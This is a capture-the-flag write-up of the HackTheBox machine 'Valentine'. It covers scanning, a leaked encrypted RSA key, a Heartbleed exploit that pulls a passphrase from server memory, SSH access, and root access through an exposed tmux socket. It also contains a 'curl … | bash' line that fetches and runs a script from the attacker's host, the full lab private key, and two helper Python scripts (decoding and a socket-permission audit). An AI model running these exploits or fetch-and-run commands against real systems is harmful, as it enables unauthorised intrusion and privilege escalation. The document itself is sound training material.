valentine


Introduction:

Recon

eneloop@kinetic:…/hackthebox/valentine/data$ sudo nmap -sS -sC -sV -O -T4 -Pn -oN nmap.valentine.txt 10.10.10.79
[sudo] password for eneloop:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-13 20:20 EST
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 20:20 (0:00:06 remaining)
Nmap scan report for 10.10.10.79
Host is up (0.015s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 96:4c:51:42:3c:ba:22:49:20:4d:3e:ec:90:cc:fd:0e (DSA)
|   2048 46:bf:1f:cc:92:4f:1d:a0:42:b3:d2:16:a8:58:31:33 (RSA)
|_  256 e6:2b:25:19:cb:7e:54:cb:0a:b9:ac:16:98:c6:7d:a9 (ECDSA)
80/tcp  open  http     Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=valentine.htb/organizationName=valentine.htb/stateOrProvinceName=FL/countryName=US
| Not valid before: 2018-02-06T00:45:25
|_Not valid after:  2019-02-06T00:45:25
|_ssl-date: 2021-02-14T01:29:37+00:00; +8m57s from scanner time.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=2/13%OT=22%CT=1%CU=31751%PV=Y%DS=2%DC=I%G=Y%TM=60287AE
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=8)OPS
OS:(O1=M54DST11NW4%O2=M54DST11NW4%O3=M54DNNT11NW4%O4=M54DST11NW4%O5=M54DST1
OS:1NW4%O6=M54DST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)ECN
OS:(R=Y%DF=Y%T=40%W=3908%O=M54DNNSNW4%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M54DST11NW4%RD=
OS:0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%R
OS:IPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: 8m56s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.01 seconds
eneloop@kinetic:…/hackthebox/valentine/data$

Enumeration

(py3) eneloop@kinetic:/oscp/tools/threader3000$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u https://10.10.10.79/ -k
Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@FireFart)
[+] Url:            https://10.10.10.79/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
2021/02/13 20:26:43 Starting gobuster
/index (Status: 200)
/dev (Status: 301)
/encode (Status: 200)
/decode (Status: 200)
/omg (Status: 200)
/server-status (Status: 403)
2021/02/13 20:32:48 Finished
(py3) eneloop@kinetic:/oscp/tools/threader3000$

eneloop@kinetic:…/valentine/data/payload$ cat hype_key | xxd -r -p
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46

DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R
5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6
0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi
Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P
OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd
pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH
QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E
p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC
Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO
t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5
XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK
aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ
+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E
AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc3KpHttvgbptfiWEEsZYn5yZPhUr9Q
r08pkOxArXE2dj7eX+bq65635OJ6TqHbAlTQ1Rs9PulrS7K4SLX7nY89/RZ5oSQe
2VWRyTZ1FfngJSsv9+Mfvz341lbzOIWmk7WfEcWcHc16n9V0IbSNALnjThvEcPky
e1BsfSbsf9FguUZkgHAnnfRKkGVG1OVyuwc/LVjmbhZzKwLhaZRNd8HEM86fNojP
09nVjTaYtWUXk0Si1W02wbu1NzL+1Tg9IpNyISFCFYjSqiyG+WU7IwK3YU5kp3CC
dYScz63Q2pQafxfSbuv4CMnNpdirVKEo5nRRfK/iaL3X1R3DxV8eSYFKFL6pqpuX
cY5YZJGAp+JxsnIQ9CFyxIt92frXznsjhlYa8svbVNNfk/9fyX6op24rL2DyESpY
pnsukBCFBkZHWNNyeN7b5GhTVCodHhzHVFehTuBrp+VuPqaqDvMCVe1DZCb4MjAj
Mslf+9xK+TXEL3icmIOBRdPyw6e/JlQlVRlmShFpI8eb/8VsTyJSe+b853zuV2qL
suLaBMxYKm3+zEDIDveKPNaaWZgEcqxylCC/wUyUXlMJ50Nw6JNVMM8LeCii3OEW
l0ln9L1b/NXpHjGa8WHHTjoIilB5qNUyywSeTBF2awRlXH9BrkZG4Fc4gdmW/IzT
RUgZkbMQZNIIfzj1QuilRVBm/F76Y/YMrmnM9k/1xSGIskwCUQ+95CGHJE8MkhD3
-----END RSA PRIVATE KEY-----

Let's test the TLS service on 443 for the Heartbleed vulnerability, as the machine name and the website are screaming "heartbleed" anyway! Note that the key is passphrase-protected (Proc-Type: 4,ENCRYPTED), so we still need a passphrase to use it.

Search heartbleed

https://gist.github.com/eelsivart/10174134

Exploitation

(py2) eneloop@kinetic:.../hackthebox/valentine/data$ python ./heartbleed_cve_2014-0160.py -v valentine.htb

defribulator v1.16
A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)

##################################################################
Connecting to: valentine.htb:443, 1 times
Sending Client Hello for TLSv1.0
Waiting for Server Hello...
Received message: type = 22, version = 0x301, length = 66
Received message: type = 22, version = 0x301, length = 885
Received message: type = 22, version = 0x301, length = 331
Received message: type = 22, version = 0x301, length = 4
Received Server Hello for TLSv1.0

Sending heartbeat request...
Received message: type = 24, version = 0x301, length = 16384
Received heartbeat response...

WARNING: valentine.htb:443 returned more data than it should - server is vulnerable!
Please wait... connection attempt 1 of 1
##################################################################

[email protected][...r....+..H...9...
....w.3....f...
...!.9.8.........5...............
.........3.2.....E.D...../...A.................................I.........
...........
...................................#.......0.0.1/decode.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...$Qi...n........\CE4F92DE4C2A60EE1395E4084FAAAFE7E26743690837915A5FF33FC7F729700527D7B31BC43569FC8F0CFC3E468C691">mac-intel</device-id>
<mac-address-list>
<mac-address>2d:e9:14:14:29:9a</mac-address></mac-address-list>
<group-select>VPN</group-select>
<group-access>https://10.10.10.79:443</group-access>
</config-auth>|...!o.2...>{...MR..

(py2) eneloop@kinetic:.../hackthebox/valentine/data$

Decode the data (the base64 value leaked in the $text= POST body):

Your input:

aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==

Your encoded input:

heartbleedbelievethehype
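The two decoding steps in this writeup (turning the hex dump hype_key back into a PEM block with xxd -r -p, and base64-decoding the $text= value pulled out of the leaked memory) can be done in one short script, which also tells you up front whether the key is passphrase-protected. The following is an added example written for this page, not code from the original post: the PEM block it decodes is a constructed stand-in rather than the real key, the leak excerpt is modelled on the dump above, and the function names (hex_dump_to_bytes, parse_pem, find_base64_strings) are my own.

```python
import base64
import binascii
import re

# Constructed sample: a tiny fake PEM block with real RFC 1421 header syntax but
# filler for the body. It is NOT the key from the box. Hex-encoded the way
# `xxd -p` writes it (60 hex digits per line) so hex_dump_to_bytes has to undo that.
SAMPLE_PEM = (
    "-----BEGIN RSA PRIVATE KEY-----\n"
    "Proc-Type: 4,ENCRYPTED\n"
    "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n"
    "\n"
    "QUJDREVGR0hJSktMTU5PUA==\n"
    "-----END RSA PRIVATE KEY-----\n"
)
_hex = binascii.hexlify(SAMPLE_PEM.encode()).decode()
SAMPLE_HEX = "\n".join(_hex[i:i + 60] for i in range(0, len(_hex), 60))

# Constructed excerpt shaped like the heartbeat response above: an HTTP POST body
# sitting in freed memory next to unrelated bytes.
SAMPLE_LEAK = (
    "....0.0.1/decode.php\n"
    "Content-Type: application/x-www-form-urlencoded\n"
    "Content-Length: 42\n\n"
    "$text=aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==...$Qi...n..."
)


def hex_dump_to_bytes(text: str) -> bytes:
    """Reverse of `xxd -p`: drop whitespace, require even-length pure hex, decode."""
    cleaned = re.sub(r"\s+", "", text)
    if len(cleaned) % 2 or not re.fullmatch(r"[0-9a-fA-F]*", cleaned):
        raise ValueError("input is not a plain hex dump")
    return binascii.unhexlify(cleaned)


def parse_pem(data: bytes) -> dict:
    """Split one PEM block into its label, RFC 1421 headers and decoded body.

    The Proc-Type/DEK-Info headers are what mark a traditional OpenSSL key as
    passphrase-encrypted; `encrypted` is True exactly when they say so.
    """
    text = data.decode("ascii")
    m = re.search(r"-----BEGIN ([^-]+)-----\n(.*?)-----END \1-----", text, re.S)
    if not m:
        raise ValueError("no complete PEM block found")
    label, inner = m.group(1), m.group(2)
    lines = inner.split("\n")
    headers = {}
    # Header lines contain ':'; base64 never does, so this cleanly separates them.
    while lines and ":" in lines[0]:
        key, _, value = lines.pop(0).partition(":")
        headers[key.strip()] = value.strip()
    body = base64.b64decode("".join(line.strip() for line in lines))
    return {
        "label": label,
        "headers": headers,
        "encrypted": headers.get("Proc-Type", "").endswith("ENCRYPTED"),
        "body": body,
    }


_B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def find_base64_strings(blob: str, min_printable: float = 0.9) -> list:
    """Pull base64-looking runs out of leaked memory text and keep the ones that
    decode to mostly printable text, returning (token, decoded) pairs."""
    found = []
    for m in _B64_RUN.finditer(blob):
        token = m.group(0)
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # random bytes that merely look like base64
        printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in raw) / max(len(raw), 1)
        if printable >= min_printable:
            found.append((token, raw.decode("ascii", "replace").strip()))
    return found


if __name__ == "__main__":
    key = parse_pem(hex_dump_to_bytes(SAMPLE_HEX))
    print(key["label"], "encrypted:", key["encrypted"], key["headers"])
    for token, plain in find_base64_strings(SAMPLE_LEAK):
        print(token, "->", plain)
```

Run against the real hype_key file, parse_pem reports the same Proc-Type and DEK-Info headers shown above, which is the signal that the key alone is useless without a passphrase; find_base64_strings is the part that would have turned the leaked POST body into the candidate passphrase without pasting it into a web form.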

eneloop@kinetic:…/valentine/data/payload$ cat hype_key | xxd -r -p > /dev/shm/id_rsa_hype
(py2) eneloop@kinetic:…/valentine/data/payload$ chmod 400 /dev/shm/id_rsa_hype
(py2) eneloop@kinetic:…/valentine/data/payload$ ssh -i /dev/shm/id_rsa_hype [email protected]
Enter passphrase for key '/dev/shm/id_rsa_hype':
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Fri Feb 16 14:50:29 2018 from 10.10.14.3
hype@Valentine:~$

Post-exploit/PrivEsc

hype@Valentine:~$ curl 10.10.14.38:8000/linpeas.sh | bash
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
 46  305k   46  143k    0     0  72610      0  0:00:04  0:00:02  0:00:02 73107 Starting linpeas. Caching Writable Folders...

Important findings:

  1. Older Linux version - OS: Linux version 3.2.0-23-generic
  2. gcc is installed
  3. We have a root session running tmux:
     root 1018 0.0 0.1 26416 1668 ? Ss Feb14 0:15 /usr/bin/tmux -S /.devs/dev_sess
  4. /home/hype/.ssh/id_rsa
  5. [+] Searching root files in home dirs (limit 30)
     /home/
     /home/hype/.tmux.conf

User Flag

hype@Valentine:~$ cd
hype@Valentine:~$ find ./ -name user.txt
./Desktop/user.txt
hype@Valentine:~$ cat ./Desktop/user.txt
e6XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX50
hype@Valentine:~$

hype@Valentine:~$ cat /home/hype/.tmux.conf
run-shell ~/.clone/path/resurrect.tmux
hype@Valentine:~$ ls -l /home/hype/.tmux.conf
-rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf

hype@Valentine:~$ find / -name '.devs' 2>/dev/null
/.devs
hype@Valentine:~$ cd .devs
-bash: cd: .devs: No such file or directory
hype@Valentine:~$ cd /.devs
hype@Valentine:/.devs$ ls -l
total 0
srw-rw---- 1 root hype 0 Feb 14 15:27 dev_sess
hype@Valentine:/.devs$

hype@Valentine:/.devs$ ps -ef | grep tmux
root      1018     1  0 Feb14 ?        00:00:15 /usr/bin/tmux -S /.devs/dev_sess
hype     24822  4678  0 06:08 pts/0    00:00:00 grep --color=auto tmux
hype@Valentine:/.devs$ /usr/bin/tmux -S /.devs/dev_sess

Because the socket is owned by root but readable and writable by group hype (srw-rw---- root hype), pointing tmux at it with -S attaches you to the root session.

root@Valentine:/home/hype#
root@Valentine:/home/hype# cd
root@Valentine:~# ls -l root.txt
-rw-r--r-- 1 root root 33 Dec 13 2017 root.txt
root@Valentine:~#
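The whole privilege escalation, from the linpeas finding of a root tmux server down to the attach, hinges on one file permission: a root-owned UNIX socket whose group is a normal user and whose mode grants that group read and write. The check below is an added example written for this page (not code from the original post or from linpeas) that audits a filesystem tree for exactly that condition from the low-privilege user's point of view. The socket name dev_sess and the demo() helper are constructed for the self-test; the permission logic is the standard owner/group/other evaluation and does not depend on them.

```python
import os
import socket
import stat
import tempfile


def socket_exposure(path: str, uid: int, gids: set) -> dict:
    """Report how a caller with `uid`/`gids` can reach the UNIX socket at `path`.

    Attaching to a tmux or screen server needs read and write on its socket,
    so that is the permission pair tested. Callers other than the owner are
    classified by group membership, which is exactly the case of a root-owned
    socket whose group is a normal user.
    """
    st = os.lstat(path)
    if not stat.S_ISSOCK(st.st_mode):
        raise ValueError(f"{path} is not a socket")
    mode = st.st_mode
    if st.st_uid == uid:
        via, rw = "owner", bool(mode & stat.S_IRUSR) and bool(mode & stat.S_IWUSR)
    elif st.st_gid in gids:
        via, rw = "group", bool(mode & stat.S_IRGRP) and bool(mode & stat.S_IWGRP)
    else:
        via, rw = "other", bool(mode & stat.S_IROTH) and bool(mode & stat.S_IWOTH)
    return {"path": path, "owner_uid": st.st_uid, "gid": st.st_gid,
            "mode": stat.filemode(mode), "via": via, "can_attach": rw}


def scan_for_foreign_sockets(top: str, uid: int, gids: set) -> list:
    """Walk `top` and return every socket owned by a different user that `uid`
    could still open read/write. Parent directories must also be searchable by
    the caller for the finding to be reachable in practice; os.walk only sees
    what the scanning user can list, so run it as that user."""
    hits = []
    for dirpath, _dirs, files in os.walk(top):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable entry: skip, do not abort the scan
            if not stat.S_ISSOCK(st.st_mode):
                continue
            info = socket_exposure(path, uid, gids)
            if info["owner_uid"] != uid and info["can_attach"]:
                hits.append(info)
    return hits


def demo() -> dict:
    """Self-contained check on a throwaway socket named after the box's
    /.devs/dev_sess (constructed). Mode 0660 with a shared group is flagged,
    the hardened 0600 is not."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "dev_sess")
        srv = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        srv.bind(path)
        try:
            st = os.lstat(path)
            other_uid = st.st_uid + 1  # pretend to be a different user who shares the socket's group
            os.chmod(path, 0o660)      # the permissions seen on the box: srw-rw----
            loose = scan_for_foreign_sockets(d, other_uid, {st.st_gid})
            os.chmod(path, 0o600)      # fixed: only the owner can attach
            tight = scan_for_foreign_sockets(d, other_uid, {st.st_gid})
        finally:
            srv.close()
    return {"loose": len(loose), "tight": len(tight),
            "loose_mode": loose[0]["mode"] if loose else None}


if __name__ == "__main__":
    # On a live host: run as the low-privilege account and walk from / to list
    # sockets that account can open but does not own.
    me, groups = os.getuid(), set(os.getgroups()) | {os.getgid()}
    for hit in scan_for_foreign_sockets("/", me, groups):
        print(f'{hit["mode"]} uid={hit["owner_uid"]} gid={hit["gid"]} via={hit["via"]} {hit["path"]}')
    print(demo())
```

On this box the scan run as hype would list /.devs/dev_sess with mode srw-rw---- and via=group, which is the finding linpeas surfaced indirectly through the process list. The fix on the server side is equally small: start the root tmux server without handing its socket to another group (the default socket under /tmp/tmux-0/ is 0700), or chmod the custom socket to 0600.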

Notes: